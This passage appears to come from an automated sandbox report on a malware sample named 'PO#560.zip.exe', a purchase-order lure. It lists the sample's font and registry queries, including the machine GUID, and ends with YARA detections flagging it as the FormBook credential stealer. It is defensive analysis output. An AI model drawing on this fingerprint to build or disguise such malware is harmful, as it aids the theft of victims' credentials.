          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.479474418.0000000000B60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.479196744.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
